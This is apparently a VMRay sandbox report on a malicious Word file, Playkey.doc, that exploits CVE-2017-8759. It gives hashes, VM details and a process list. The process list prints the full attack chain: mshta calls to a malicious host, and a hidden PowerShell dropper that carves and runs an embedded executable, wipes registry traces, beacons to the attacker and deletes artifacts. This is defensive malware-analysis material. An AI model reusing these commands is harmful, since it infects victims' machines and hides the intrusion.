RTF Doc. Uses CVE-2017-8759 Exploit to Execute Code | VMRay Analyzer Report
Try VMRay Analyzer
Analysis Information
Creation Time 2017-10-24 19:37 (UTC+2)
VM Analysis Duration Time 00:02:38
Execution Successful True
Sample Filename Playkey.doc
Command Line Parameters False
Prescript False
Number of Processes 10
Termination Reason Timeout
Reputation Enabled True
Download Archive Function Logfile Generic Logfile PCAP STIX/CybOX XML Summary JSON
VTI Information
VTI Score
96 / 100
VTI Database Version 2.6
VTI Rule Match Count 11
VTI Rule Type Documents
Tags
#CVE #Exploit #Malware
Remarks
Critical The maximum number of dumps was reached during the analysis. Some memory dumps may be missing in the reports. You can increase the limit in the configuration.
Critical The dump total size limit was reached during the analysis. Some memory dump may be missing in the reports. You can increase the limit in the configuration.
Screenshots
Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot
Monitored Processes
Process Graph


ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0x9b0 Analysis Target Medium winword.exe "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" -
#2 0xba0 Child Process Medium csc.exe "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.cmdline" #1
#3 0xbb8 Child Process Medium cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\aETAdzjz\AppData\Local\Temp\RESEDB9.tmp" "c:\Users\aETAdzjz\Desktop\CSCED98.tmp" #2
#4 0xbc0 Child Process Medium mshta.exe "C:\Windows\System32\mshta.exe" http://www.samyrai777m.p-host.in/t/t.php?thread=0 #1
#5 0xbc8 Child Process Medium mshta.exe "C:\Windows\System32\mshta.exe" http://www.samyrai777m.p-host.in/t/t.php?thread=0 #1
#7 0x370 Child Process Medium mshta.exe "C:\Windows\System32\mshta.exe" http://www.samyrai777m.p-host.in/t/t.php?thread=0 #1
#8 0x664 Child Process Medium powershell.exe "C:\Windows\SYSteM32\windowspOweRSHeLL\V1.0\PoWErSHELL.Exe" -WindowStyle Hidden Try{$ada="""$env:APPDATA\result.exe""";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf="""$env:TEMP\o.tmp""";taskkill /f /im winword.exe;Function pr{Try{$k="""HKCU:\Software\Microsoft\Office\$wv\Word\Resiliency\StartupItems\""";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri -Path """HKCU:\Software\Microsoft\Office\$wv\Word\Resiliency""" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword """$r""";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\).Path;ri """$cd\*""" -include http*.pdb, http*.dll, *.cs;}Catch{}};$wv='12.0';pr;$wv='14.0';pr;$wv='15.0';pr;$wv='16.0';pr;Stop-Process -processname powershell;}Catch{exit;} #5
#9 0x2ac Child Process Medium powershell.exe "C:\Windows\SYSteM32\windowspOweRSHeLL\V1.0\PoWErSHELL.Exe" -WindowStyle Hidden Try{$ada="""$env:APPDATA\result.exe""";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf="""$env:TEMP\o.tmp""";taskkill /f /im winword.exe;Function pr{Try{$k="""HKCU:\Software\Microsoft\Office\$wv\Word\Resiliency\StartupItems\""";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri -Path """HKCU:\Software\Microsoft\Office\$wv\Word\Resiliency""" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword """$r""";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\).Path;ri """$cd\*""" -include http*.pdb, http*.dll, *.cs;}Catch{}};$wv='12.0';pr;$wv='14.0';pr;$wv='15.0';pr;$wv='16.0';pr;Stop-Process -processname powershell;}Catch{exit;} #4
#10 0x968 Child Process Medium powershell.exe "C:\Windows\SYSteM32\windowspOweRSHeLL\V1.0\PoWErSHELL.Exe" -WindowStyle Hidden Try{$ada="""$env:APPDATA\result.exe""";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf="""$env:TEMP\o.tmp""";taskkill /f /im winword.exe;Function pr{Try{$k="""HKCU:\Software\Microsoft\Office\$wv\Word\Resiliency\StartupItems\""";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri -Path """HKCU:\Software\Microsoft\Office\$wv\Word\Resiliency""" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword """$r""";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\).Path;ri """$cd\*""" -include http*.pdb, http*.dll, *.cs;}Catch{}};$wv='12.0';pr;$wv='14.0';pr;$wv='15.0';pr;$wv='16.0';pr;Stop-Process -processname powershell;}Catch{exit;} #7
#11 0x5f4 Child Process Medium taskkill.exe "C:\Windows\system32\taskkill.exe" /f /im winword.exe #9
Sample Information
ID #19989
MD5 Hash Value 9587a58c5d456ca4fb8d8abba0945861
SHA1 Hash Value 18bb1da68d2073efb52ce3792311b15e958d85a5
SHA256 Hash Value 7a641c8fa1b7a428bfb66d235064407ab56d119411fbaca6268c8e69696e6729
Filename Playkey.doc
File Size 987.89 KB (1011599 bytes)
File Type Word Document
Has VBA Macros False
Analyzer and Virtual Machine Information
Analyzer Version 2.2.0
Analyzer Build Date 2017-10-17 16:08
Microsoft Office Version 2016
Microsoft Word Version 16.0.4266.1003
Internet Explorer Version 8.0.7601.17514
Chrome Version 59.0.3071.115
Firefox Version 25.0
Flash Version 10.3.183.90
Java Version 7.0.710
VM Name win7_64_sp1-mso2016
VM Architecture x86 64-bit
VM OS Windows 7
VM Kernel Version 6.1.7601.17514 (3844dbb9-2017-4967-be7a-a4a2c20430fa)
Function Logfile
Download-Icon
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy". 


    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image